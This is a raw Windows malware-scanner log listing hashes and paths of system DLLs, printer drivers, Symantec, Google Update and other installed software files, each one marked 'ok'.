15:34:00.0363 0x04bc  [ 32802C0F6FC7C8F561B9D91F52A46421, EE02CF54FC3626D85849EF14D9B7B57419F12D1DD0735C25ECBD987EE53F634B ] C:\Windows\System32\cscui.dll
15:34:00.0363 0x04bc  C:\Windows\System32\cscui.dll - ok
15:34:00.0365 0x04bc  [ 024352FEEC9042260BB4CFB4D79A206B, 60CB39086E10C5B66EBC15E4DF219620B344B4358D2918AB6BB3448A0AC8BE36 ] C:\Windows\System32\EhStorShell.dll
15:34:00.0365 0x04bc  C:\Windows\System32\EhStorShell.dll - ok
15:34:00.0367 0x04bc  [ 6EFCD421A245367B95CAEA0D0DC5F1E7, 060B1939FBE6500ACE2814B490465F7F9E9CA398750F1E57CEA3F3A29F1FB638 ] C:\Windows\System32\cscdll.dll
15:34:00.0367 0x04bc  C:\Windows\System32\cscdll.dll - ok
15:34:00.0369 0x04bc  [ 037A719DAD50603202C978CD802623E4, BD4C222913D32D7CF5FE0201FEBE7BD67FC39DF47A7A672C2D6C228A6E13B5DE ] C:\Windows\System32\ntshrui.dll
15:34:00.0369 0x04bc  C:\Windows\System32\ntshrui.dll - ok
15:34:00.0371 0x04bc  [ 1D63F4366288B8A7595397E27010FD44, 99EA4DDD88D9C4A4CC9B238F533CB4D2C062D46239173997E8594D8A75811A01 ] C:\Windows\System32\IconCodecService.dll
15:34:00.0371 0x04bc  C:\Windows\System32\IconCodecService.dll - ok
15:34:00.0372 0x04bc  [ 025E7DBDB98866ED3CB2D4DDA70B364D, 78962F23F066E362AF1A4B98FA7D5E30AF30C561307438503031D30C944B6A6E ] C:\Windows\System32\runonce.exe
15:34:00.0372 0x04bc  C:\Windows\System32\runonce.exe - ok
15:34:00.0374 0x04bc  [ 487F44B08EFEAF5AD087878357B9403D, B02C99850940588D52B3E6DB30DB64582F294E0BD62101067BECFEA1483010C6 ] C:\Windows\SysWOW64\pdh.dll
15:34:00.0374 0x04bc  C:\Windows\SysWOW64\pdh.dll - ok
15:34:00.0376 0x04bc  [ D44741F65A1D71F65814A12CF6E2400A, C6721F830675ADC7E7FDE2B5E822E56F6A063146F5066F1E25EBFE86F0A87136 ] C:\Windows\SysWOW64\runonce.exe
15:34:00.0376 0x04bc  C:\Windows\SysWOW64\runonce.exe - ok
15:34:00.0378 0x04bc  [ 12C45E3CB6D65F73209549E2D02ECA7A, 9DFD9C58B90257C34D52B7156C1D2566BE32EE7BD4699DDE164A5F190EC4D44A ] C:\Windows\SysWOW64\propsys.dll
15:34:00.0378 0x04bc  C:\Windows\SysWOW64\propsys.dll - ok
15:34:00.0380 0x04bc  [ AD7B9C14083B52BC532FBA5948342B98, 17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE ] C:\Windows\SysWOW64\cmd.exe
15:34:00.0380 0x04bc  C:\Windows\SysWOW64\cmd.exe - ok
15:34:00.0381 0x04bc  [ 3DBA2C872635DB3E7DF76ACF57F7BA4D, 268B2F36C1BBAB69CC09D4F01BDF82A8F3B0BB07F210688B0E77E1A210494576 ] C:\Windows\System32\spool\drivers\x64\3\CNLB0409_DBB31.DLL
15:34:00.0381 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNLB0409_DBB31.DLL - ok
15:34:00.0383 0x04bc  [ FDC385A0F7D7DD880C4622D1DF08ABE9, D9596264D98B09A5C44DD63B69B7253377B5FF237B6F2C4F97258E86FFAD055A ] C:\Windows\System32\ntprint.dll
15:34:00.0383 0x04bc  C:\Windows\System32\ntprint.dll - ok
15:34:00.0385 0x04bc  [ 326C7F76A29897A892AA7726E91C1C67, 64305346B06EC14976130B0B80F14B4D5AB63E5B2A6A7B872EC9CE2BF8FADCD2 ] C:\Windows\SysWOW64\winbrand.dll
15:34:00.0385 0x04bc  C:\Windows\SysWOW64\winbrand.dll - ok
15:34:00.0387 0x04bc  [ 46AD2C023AFAE4B34BB53A03D3D29A45, 3E14B8498AF48A05D4C1C8F8FDE463BD54312321D4B2E7CD20D1C4559D473709 ] C:\Windows\SysWOW64\ieframe.dll
15:34:00.0387 0x04bc  C:\Windows\SysWOW64\ieframe.dll - ok
15:34:00.0389 0x04bc  [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] C:\Windows\System32\aelupsvc.dll
15:34:00.0389 0x04bc  C:\Windows\System32\aelupsvc.dll - ok
15:34:00.0391 0x04bc  [ 60F4AEFA103D421EA4A40E31409B4756, 037A8605CA504A4FF43E9D4DE9017CEA1E26D3556C975872C747E24D8B0835EF ] C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
15:34:00.0391 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll - ok
15:34:00.0393 0x04bc  [ 2C4A87CA8C00E98EFDCFA2E8EC9A3503, DA59CE662E98E56D89E2894D2AC8B9F324C16DA23C860640EDC2C82E0AD06097 ] C:\Windows\SysWOW64\shdocvw.dll
15:34:00.0393 0x04bc  C:\Windows\SysWOW64\shdocvw.dll - ok
15:34:00.0395 0x04bc  [ 2AD9820E4B17E78110A6AA06BF5C1CE2, 330A62FC255D24FCF7904B11CD533A9A06C1EBDBD90491A11960317759E7F4D0 ] C:\Users\boylem1\AppData\Local\Temp\{638DF7CF-3588-4571-AD36-F6B8A96B4673}.exe
15:34:00.0395 0x04bc  C:\Users\boylem1\AppData\Local\Temp\{638DF7CF-3588-4571-AD36-F6B8A96B4673}.exe - ok
15:34:00.0397 0x04bc  [ E7B9D5FF20FFDD4AAE2EF1D1B8C27A37, 689D126B1B42140D5049015E3E324268E6542D4BC6CC14E31D8B89A25B94BAA5 ] C:\Windows\SysWOW64\imagehlp.dll
15:34:00.0397 0x04bc  C:\Windows\SysWOW64\imagehlp.dll - ok
15:34:00.0399 0x04bc  [ 8CABF17D928F1399F1F541B27CDB73C4, A6E1EE07CF613DDB9C3E8B86935FB006299E033AE9C62440D10994FF606946B7 ] C:\Windows\SysWOW64\gpapi.dll
15:34:00.0399 0x04bc  C:\Windows\SysWOW64\gpapi.dll - ok
15:34:00.0401 0x04bc  [ 7B851A8018B1EA00A69707A390004884, DAE654713EF1DC66C8C2D27752B659081794063A7D522D1F680AA9A6E7FBA9FD ] C:\Windows\SysWOW64\cryptnet.dll
15:34:00.0401 0x04bc  C:\Windows\SysWOW64\cryptnet.dll - ok
15:34:00.0403 0x04bc  [ 6F8E3B7B70E1BBA871212940C1FBDF60, 3F9D4EE64E4210340C6FEE0DE81BFE3C613DDBE608EC09D63817D24CE24BFC5E ] C:\Windows\SysWOW64\SensApi.dll
15:34:00.0403 0x04bc  C:\Windows\SysWOW64\SensApi.dll - ok
15:34:00.0405 0x04bc  [ A054EA8FBE16D4D34F06D81A4F0088E2, 1CD4EECFDA374C8A7B8AD4E664DC057B9C75813AF776A616DC6D845905567CBD ] C:\Windows\SysWOW64\WindowsCodecs.dll
15:34:00.0405 0x04bc  C:\Windows\SysWOW64\WindowsCodecs.dll - ok
15:34:00.0406 0x04bc  [ 846D0E4DB261CFAF363902E41498E961, D7E5591B7604FD583AF7FDA19E30928B24A6145318A3944E7D207F0CCEEB30D0 ] C:\Windows\SysWOW64\EhStorShell.dll
15:34:00.0406 0x04bc  C:\Windows\SysWOW64\EhStorShell.dll - ok
15:34:00.0408 0x04bc  [ 03F3B770DFBED6131653CEDA8CA780F0, 77373919DCA647F09851E7E460AE78FBD89F21516B961F84AC4446304E51E09C ] C:\Windows\SysWOW64\ntshrui.dll
15:34:00.0408 0x04bc  C:\Windows\SysWOW64\ntshrui.dll - ok
15:34:00.0410 0x04bc  [ 8B74CEC6980D4816B0037AE9A27E538F, 8721EDB4C51BF6020002FA5DDB1987C68590F9F433A2F18D9756B2DAC7542CB6 ] C:\Windows\SysWOW64\slc.dll
15:34:00.0410 0x04bc  C:\Windows\SysWOW64\slc.dll - ok
15:34:00.0412 0x04bc  [ 827CB0D6C3F8057EA037FF271F8E9795, 82760DBDDD38D2A31CAAF51D065DF4E7E1D0F0C22733A0AF653776EBF7B79470 ] C:\Windows\SysWOW64\imageres.dll
15:34:00.0412 0x04bc  C:\Windows\SysWOW64\imageres.dll - ok
15:34:00.0414 0x04bc  [ 0FDAC40A3866333A9F0BB73CA0576A67, 67E0E998A5D7FF9485221CEA25E2B6F12A0E441E891001ACC89CF90B3E69D65E ] C:\Windows\System32\spool\drivers\x64\3\AUSSDRV.DLL
15:34:00.0414 0x04bc  C:\Windows\System32\spool\drivers\x64\3\AUSSDRV.DLL - ok
15:34:00.0416 0x04bc  [ 930D94172D4537C9E60C223FFB92D1EC, 581726A6C738A1816D63BFE78C7E892CC351B42B01136CD9A6ECD588949AF8E9 ] C:\Windows\System32\spool\drivers\x64\3\CNXP0RSW.DLL
15:34:00.0416 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXP0RSW.DLL - ok
15:34:00.0418 0x04bc  [ 15CCF84918FAFCA14B9B86EE3FCEADA7, 1EE79A002AEEF1D558E594C1F2DD18116949FCEF17A22777A45AD036C83C281B ] C:\Windows\System32\spool\drivers\x64\3\CNXP0LOG.DLL
15:34:00.0418 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXP0LOG.DLL - ok
15:34:00.0420 0x04bc  [ 523CF74A52C9A1762DA8B83AEE734498, 5A739182B916738B611E1BBA9098F8BCC8C4E2CC2CFEFD1BC5CE7941D11CEDFD ] C:\Windows\SysWOW64\IconCodecService.dll
15:34:00.0420 0x04bc  C:\Windows\SysWOW64\IconCodecService.dll - ok
15:34:00.0422 0x04bc  [ 690B7BD75A4B6107D095B5AE945F6063, 657E45B38FCA972CD513F90AC71BDF4D5AA7489D174763A9743521393B0F0B96 ] C:\Windows\System32\spool\drivers\x64\3\CNXPCF32.DLL
15:34:00.0422 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXPCF32.DLL - ok
15:34:00.0424 0x04bc  [ 3377CD1A7ACDF9E8D3E694DE080AD411, 972A312FA51E5AA3C64DA750F68FB72A49C6DB27559858A8F0D5C45E63C3EEC6 ] C:\Windows\System32\spool\drivers\x64\3\CNXPCP32.DLL
15:34:00.0424 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXPCP32.DLL - ok
15:34:00.0425 0x04bc  [ FCE777B90F0B933763CCA281E10929E4, B447392AAA7D7DF61E5DEF13C9101C61C5E2F7D166B7B72E058A9AF9B3DD8513 ] C:\Windows\System32\spool\drivers\x64\3\CNXPTN32.DLL
15:34:00.0426 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXPTN32.DLL - ok
15:34:00.0427 0x04bc  [ 8EC66A4644FB151BF131252BF96A0248, 9243B85E193ED6D5CEEB23303459EF2F2140DC6A23C7BC2AA6624351A6FEE020 ] C:\Windows\System32\spool\drivers\x64\3\CPC10S.DLL
15:34:00.0427 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC10S.DLL - ok
15:34:00.0429 0x04bc  [ CC14B4EF85C3B391A1300682574DF3B0, 14B469D6448699F379454AB435DA9905BBF9685B5CF21DA1205146FC37DBC81D ] C:\Windows\System32\spool\drivers\x64\3\CPC10D.EXE
15:34:00.0429 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC10D.EXE - ok
15:34:00.0431 0x04bc  [ 2534D38EA404FEE8B8FF138E8E2FEE4F, 287C69016E2D3615E5D97CAF87A139A85594A99D70A15E5AC8A215F0A8A5EEB8 ] C:\Windows\System32\spool\drivers\x64\3\CPC10Q.EXE
15:34:00.0431 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC10Q.EXE - ok
15:34:00.0433 0x04bc  [ 1345046E637A57D0406036721A96DDBE, 833885A3698B745A3DE745FF5BFA503EE5DB11631D69BDD382C8895DEBC2E7B9 ] C:\Windows\System32\spool\drivers\x64\3\CPC10E.DLL
15:34:00.0433 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC10E.DLL - ok
15:34:00.0435 0x04bc  [ 279B62822858354D927AE2FECFF6807C, 20ABD8435EFF56341C19DD672DE367F50559B74D6C1F48E22D3C4D26582760B4 ] C:\Windows\System32\spool\drivers\x64\3\CPC10V.EXE
15:34:00.0435 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC10V.EXE - ok
15:34:00.0437 0x04bc  [ E3FF83AF3B0B64BB33EE87E67EF8898C, D2D62AA6AD04D7ADFEBC6445FADBF8DD5AC55BEEB420AFCAAFC6FB3DA2E26B74 ] C:\Windows\System32\spool\drivers\x64\3\CPC1US.DLL
15:34:00.0437 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CPC1US.DLL - ok
15:34:00.0439 0x04bc  [ 36B5D2DD5001F4D5A37E9607BACAC445, DA39FD66BF0A83A666F3F3023D148817583F0F3CA47E7BE83ECD9A812BE39054 ] C:\Windows\System32\spool\drivers\x64\3\CNLBCM32.DLL
15:34:00.0439 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNLBCM32.DLL - ok
15:34:00.0441 0x04bc  [ 0022ACC13203EA0DEA1E4E85C6DA3DC6, 3AB98EF3BDEEE89AA6CCBCF10A9525CCF8A14537A01648D89342D8FB824F8C08 ] C:\Windows\System32\spool\drivers\x64\3\UCS32P.DLL
15:34:00.0441 0x04bc  C:\Windows\System32\spool\drivers\x64\3\UCS32P.DLL - ok
15:34:00.0443 0x04bc  [ DA73E8D1B55B88256FEE0ECDF39B1DDF, 19CCA74105E48B7375AF5D479AE02F6240C3555765B2E6EE16041993034951B7 ] C:\Windows\System32\spool\drivers\x64\3\CNXDIAS2.DLL
15:34:00.0443 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNXDIAS2.DLL - ok
15:34:00.0445 0x04bc  [ 0AF1AEB22512E4AFAD5BE09B4EA9DEEB, AE83B61E3001F18C527443D351AA8E95D7B5CA883A75E8EA5EB699D388F538D7 ] C:\Windows\System32\spool\drivers\x64\3\CNKYNS32.DLL
15:34:00.0445 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNKYNS32.DLL - ok
15:34:00.0447 0x04bc  [ D4B96959BC00B3CA5FD29AE5CE418412, CD65A0306B5A43B145C2830AC961C551C261C425B55EECE9D662E1CCCDC49AA4 ] C:\Windows\System32\spool\drivers\x64\3\CNRGBVIRTUALDEVICE.DLL
15:34:00.0447 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNRGBVIRTUALDEVICE.DLL - ok
15:34:00.0449 0x04bc  [ 6EFFDE4FA3330F41775161BA12C38068, 30351D746025C27B8359FA31E059C6606E8D93F302531F6E3616ECFD9F30915F ] C:\Windows\System32\spool\drivers\x64\3\CNRGBPRINTER.DLL
15:34:00.0449 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNRGBPRINTER.DLL - ok
15:34:00.0451 0x04bc  [ A39B9E93F6A6E482B370B6F2CE99EAEF, DA8D3BDEA93D0C854A578AEC7539E5D59583F9663400F704C66F2F08147ABCCF ] C:\Windows\System32\spool\drivers\x64\3\CNPERCEPTUAL.DLL
15:34:00.0451 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNPERCEPTUAL.DLL - ok
15:34:00.0453 0x04bc  [ 6FAEDAD7DCB0E062B708A7864E30A4DA, 0156FD5A8C6BF03FF9992C81AE9416828BCA8B1DF23DF10EC8CD4687586F03B9 ] C:\Windows\System32\spool\drivers\x64\3\CNMONITORMATCH.DLL
15:34:00.0453 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNMONITORMATCH.DLL - ok
15:34:00.0455 0x04bc  [ 92E50FE33BCEE6084AA6EA6AF0D4B947, F5CE0F50DE209B2A02F1BDE94553FA2600DAE743E9F2776DEFCA779E356A50A1 ] C:\Windows\System32\spool\drivers\x64\3\CNCOLORIMETRIC.DLL
15:34:00.0455 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNCOLORIMETRIC.DLL - ok
15:34:00.0457 0x04bc  [ 9013A5D6C6D48A2AB734124E1ADBA281, 5FAB94503F932B6A6125288E8ED51A14A8FE020168998069E3C5CA5016CE6A77 ] C:\Windows\System32\spool\drivers\x64\3\CNSATURATION.DLL
15:34:00.0457 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNSATURATION.DLL - ok
15:34:00.0459 0x04bc  [ E243FE74E2ADE67A1BD3F79E6D8D9245, 247832F36259907A7EFC4F4DD718EDE788B3A979D734165AE5133417E6EA25F7 ] C:\Program Files (x86)\Google\Update\1.3.25.5\goopdate.dll
15:34:00.0459 0x04bc  C:\Program Files (x86)\Google\Update\1.3.25.5\goopdate.dll - ok
15:34:00.0461 0x04bc  [ EE19C85CA685A275BE346EC41F1870F9, F071D88C38C62E9D88DDE29F451B2B581499758A7E60BDA6DED3376280C5A635 ] C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18455_none_72d576ad8665e853\GdiPlus.dll
15:34:00.0461 0x04bc  C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18455_none_72d576ad8665e853\GdiPlus.dll - ok
15:34:00.0463 0x04bc  [ A5CA5DBE47728E6F629DB3E0FD88AC6B, 16EFABF70D618812A782F5D9CBE274A759C317B4633B2C2CA7CF0B72B29FF32E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SavMainUIRes.dll
15:34:00.0463 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SavMainUIRes.dll - ok
15:34:00.0465 0x04bc  [ C212A43AA83A717AD38505F23ACDCB33, 52BFF0FB72D2C4543ECB2C2F6E1DA63E548BAFCE553EECBB18F287AC2CF5EF28 ] C:\Windows\SysWOW64\msi.dll
15:34:00.0466 0x04bc  C:\Windows\SysWOW64\msi.dll - ok
15:34:00.0468 0x04bc  [ 24396FB13CCF3721BC7719AD00F01FF8, 460D2345CD7C30B978CAB2CE8FEE859A9D7E25995A14CAF917D6B8AB90937C5E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\HPPProtectionProviderUI.dll
15:34:00.0468 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\HPPProtectionProviderUI.dll - ok
15:34:00.0470 0x04bc  [ 6D905BA666CE29833343BD8179EFA418, AAB64FE3F06BB279DD90022E856F0EB5D0222087FB111F371A986C2A4F7190E5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVTrayStatus.dll
15:34:00.0470 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVTrayStatus.dll - ok
15:34:00.0472 0x04bc  [ 46969356519A2F6C020EC52C4E3E9110, 760851CABB18F1C86429A04711B4CE6883D373060983FF4B4D5AB67FA9C7CD92 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\HPPProtectionProviderUIRes.dll
15:34:00.0472 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\HPPProtectionProviderUIRes.dll - ok
15:34:00.0474 0x04bc  [ 80D9FAD37A99E37273128563A7232BA5, 816FFE015FE96B6F043CF04E116269B5011FE0352CA09E61567BAED3AAEBE32B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BashEimProxy.dll
15:34:00.0474 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\BashEimProxy.dll - ok
15:34:00.0477 0x04bc  [ CB45071E209C82DE1B599D0D25872E3A, D24560EC2F74C9544428BEE20FD1C7DA517EC08222E1F7E566161B41652C43F8 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SMCTrayStatus.dll
15:34:00.0477 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SMCTrayStatus.dll - ok
15:34:00.0479 0x04bc  [ 9E30721F02013B2FC403987DB0A40E2A, 6A50859C4475DE6DB03FFCB56F2E1539A074A1E5F9C3227FAAAA8773E445FE38 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\FWTrayStatus.dll
15:34:00.0479 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\FWTrayStatus.dll - ok
15:34:00.0481 0x04bc  [ 575B06D5157B432D1ECB4A709BEE18E8, E1A0E4A31F1CFE1053F8E205509B5A44F21A0AE3A2DDF1D83E34384EF7BF48F3 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CidsTrayStatus.dll
15:34:00.0481 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\CidsTrayStatus.dll - ok
15:34:00.0484 0x04bc  [ E96775B210AD89D3938012817CB26EFB, 25FE20FF7091710A6AF9511768F2B7D23864655EC54D4BFA26F6E947DEC93AD3 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\PTPTrayStatus.dll
15:34:00.0484 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\PTPTrayStatus.dll - ok
15:34:00.0486 0x04bc  [ B5A679BDED9E1F497CE598590AFA61D2, 95BB38C3F22EC5B05869BD096A562E048ECA689A8E193771F0EFA7BDB48E49C5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SNACTrayStatus.dll
15:34:00.0486 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SNACTrayStatus.dll - ok
15:34:00.0488 0x04bc  [ 53223B673A3FA2F9A4D1C31C8D3F6CD8, B07A12E3ECD5E418A3F99F00C56E7F482F68CADE330E7C079DCCDFFAD2E21299 ] C:\Windows\SysWOW64\dbghelp.dll
15:34:00.0488 0x04bc  C:\Windows\SysWOW64\dbghelp.dll - ok
15:34:00.0490 0x04bc  [ 976D5F35A058340DA2C160CEC4063C4B, 156210FFE32821DBC0BEE39FE1CD7CD30ECFC02B80EF02DC2A990DA06B87A925 ] C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe
15:34:00.0490 0x04bc  C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe - ok
15:34:00.0492 0x04bc  [ 047556104954A72A2222FFF169166EEE, B9DED78A089FDCBF557D99546107E384D077D617655D14990E14FDA9A3B609ED ] C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe
15:34:00.0492 0x04bc  C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe - ok
15:34:00.0494 0x04bc  [ C5A99A4C0DC9F0F5A95BA0C83D30A549, F99CCCE303F0FC07D82D3BBA223E8CCE41FB7FA8FB5C2A9214C161826537C7C9 ] C:\Windows\SysWOW64\mstask.dll
15:34:00.0494 0x04bc  C:\Windows\SysWOW64\mstask.dll - ok
15:34:00.0496 0x04bc  [ A7A8CA53D9C9FD90C07AB0EB38E5316B, B98722E76601A98F038F40703C4B8BD21B5EC3B65DC1B07B7C367C06448F8A0E ] C:\Windows\System32\dbghelp.dll
15:34:00.0496 0x04bc  C:\Windows\System32\dbghelp.dll - ok
15:34:00.0498 0x04bc  [ 2A86C18CE6869C77FCEB62F3B47D4D5B, 6E282C56A208E26C8921CC396F4AF9D1681D26E3B22126FAEF3640400864B29F ] C:\Windows\SysWOW64\credssp.dll
15:34:00.0498 0x04bc  C:\Windows\SysWOW64\credssp.dll - ok
15:34:00.0499 0x04bc  [ 40CAEEE0EAF1B8569F7C8DF6420F2CB9, E18D66455D00A6D2A2D7CC0833C233FE8A6DD910B59D6B5B5F82EF91450858DF ] C:\Windows\SysWOW64\sfc.dll
15:34:00.0499 0x04bc  C:\Windows\SysWOW64\sfc.dll - ok
15:34:00.0501 0x04bc  [ 84799328D87B3091A3BDD251E1AD31F9, F85521215924388830DBB13580688DB70B46AF4C7D82D549D09086438F8D237B ] C:\Windows\SysWOW64\sfc_os.dll
15:34:00.0501 0x04bc  C:\Windows\SysWOW64\sfc_os.dll - ok
15:34:00.0503 0x04bc  [ 162D247E995EAEBF3EF4289069E1111C, 19E858E9902E2D570FFD24AE2CB4165273F5BAB1FF7B04758B11AB5CD41FD752 ] C:\Windows\SysWOW64\devrtl.dll
15:34:00.0503 0x04bc  C:\Windows\SysWOW64\devrtl.dll - ok
15:34:00.0505 0x04bc  [ 1FCB1A72BF5C784F7358E6BEF38E4571, 12DA4240F8C964EDA6223257BD9723FD9372E63AE86F00509163B1DE12A5F6C5 ] C:\Windows\System32\timedate.cpl
15:34:00.0505 0x04bc  C:\Windows\System32\timedate.cpl - ok
15:34:00.0507 0x04bc  [ E6F0F82788E8BD0F7A616350EFA0761C, 13091DCB3E3F4F52C3FF210E93AAF1DCE142CFC09F671AEAC5B922393B23E67B ] C:\Windows\System32\actxprxy.dll
15:34:00.0507 0x04bc  C:\Windows\System32\actxprxy.dll - ok
15:34:00.0509 0x04bc  [ 23B001185B7C3CB1F4BDEB143E6B45B7, AB3A5AB346F6353B43B06FBE20B7785DA988975E2C8B73A6588F107FFAAACC47 ] C:\Windows\System32\shdocvw.dll
15:34:00.0509 0x04bc  C:\Windows\System32\shdocvw.dll - ok
15:34:00.0511 0x04bc  [ A0A65D306A5490D2EB8E7DE66898ECFD, CE5DA408F4EDD5E81CE0925867F03C9A35172CF1571FE4C4C052E45AB69822BB ] C:\Windows\System32\linkinfo.dll
15:34:00.0511 0x04bc  C:\Windows\System32\linkinfo.dll - ok
15:34:00.0513 0x04bc  [ 1EAC1A8CA6874BF5B15E2EFB9A9A7B86, E15ED4FEFC3010C213694331DDFDC03767682325C898D773AB243E2DC8B08461 ] C:\Windows\System32\msftedit.dll
15:34:00.0513 0x04bc  C:\Windows\System32\msftedit.dll - ok
15:34:00.0514 0x04bc  [ 112183DF91C9BAECB498E4A86ECDE598, 33E9256ACC4EA747177FF0922FCA679849F89F695E469BB8C8F25BD5B5B1A583 ] C:\Windows\System32\msls31.dll
15:34:00.0515 0x04bc  C:\Windows\System32\msls31.dll - ok
15:34:00.0516 0x04bc  [ 80041798F2F049259241393A2017DB02, 59B8913A129EC26FB111C2C614C0C7440D521F65BAF32E57CA48E34337C0DDEE ] C:\Program Files\Common Files\Microsoft Shared\ink\tiptsf.dll
15:34:00.0516 0x04bc  C:\Program Files\Common Files\Microsoft Shared\ink\tiptsf.dll - ok
15:34:00.0518 0x04bc  [ 70D2D88F5301B21488708A1F1A263D4F, 1F9B7617757A13C1E6CEE94F4714AE58CD087E550883AFE125E4C9BE379008F6 ] C:\Windows\System32\igfxtray.exe
15:34:00.0518 0x04bc  C:\Windows\System32\igfxtray.exe - ok
15:34:00.0520 0x04bc  [ 4C2C4640BF23AAFCF90519E0F34436CE, 8ACCDA77C2DC5BE2DAED05134310122AFECC872A8D118612E55DD229BFE4D844 ] C:\Windows\System32\DeviceCenter.dll
15:34:00.0520 0x04bc  C:\Windows\System32\DeviceCenter.dll - ok
15:34:00.0522 0x04bc  [ 68B83F92E02584FF5CB7B80CACDC8C24, 3457D61A7F15C2EE508203A93AE0171AA153EB5A6FF671556387B1965AA07F0E ] C:\Windows\System32\hkcmd.exe
15:34:00.0522 0x04bc  C:\Windows\System32\hkcmd.exe - ok
15:34:00.0524 0x04bc  [ 2AC55814155D090E84EB8188F73CDBA7, B4D49C2E8AE191901D38CA32C58B390F7735F60E17B080B061C3347E504AE188 ] C:\Windows\System32\igfxpers.exe
15:34:00.0524 0x04bc  C:\Windows\System32\igfxpers.exe - ok
15:34:00.0526 0x04bc  [ B0F69B9DE0AEBFD7E4CEADE6758DF627, 60235E6D0614ED72CDF05E9A62B2B264614CAB29C47246ED408B85BEBE602CCD ] C:\Windows\System32\SearchFolder.dll
15:34:00.0526 0x04bc  C:\Windows\System32\SearchFolder.dll - ok
15:34:00.0527 0x04bc  [ 4E81439902079C348B61D7FF027FE147, E652C9EC77745504689532B3C394959F9B5BC29E9C008CB9EE09CDA818514FA9 ] C:\Windows\System32\StructuredQuery.dll
15:34:00.0528 0x04bc  C:\Windows\System32\StructuredQuery.dll - ok
15:34:00.0529 0x04bc  [ 24F4B480F335A6C724AF352253C5D98B, 011413B236CAD7B78CE0A0EEC3E3085D48C7576A3205D025BA6EBFDF590538E4 ] C:\Windows\System32\thumbcache.dll
15:34:00.0529 0x04bc  C:\Windows\System32\thumbcache.dll - ok
15:34:00.0531 0x04bc  [ B10B692825D7FAE41CB7C3F92AE17233, C1F7B347CF04D5881E2F17FFB5C7AB8DD0EB83261166D0AD94E4C8843E2863A2 ] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
15:34:00.0531 0x04bc  C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe - ok
15:34:00.0533 0x04bc  [ 0DB0C404F39E8ACA64F9A655C6C7896C, 7393481A6F040BBE656667D4423F545DDADB7CCD21A97EA06643D88F06C4C013 ] C:\Windows\System32\hccutils.dll
15:34:00.0533 0x04bc  C:\Windows\System32\hccutils.dll - ok
15:34:00.0535 0x04bc  [ F8857019B23468654F3AB34482F9740E, E36784A08134136ADDAE22C1EA2B32683384DEBE963B341424612A4166536A64 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CiscoJabber.exe
15:34:00.0535 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CiscoJabber.exe - ok
